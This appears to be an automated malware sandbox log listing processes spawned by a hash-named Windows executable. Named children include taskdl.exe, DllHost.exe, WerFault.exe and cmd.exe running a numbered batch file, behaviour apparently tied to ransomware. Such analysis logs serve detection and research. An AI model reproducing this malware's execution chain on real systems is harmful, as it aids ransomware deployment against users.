Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 916	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 36751721951490.bat	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
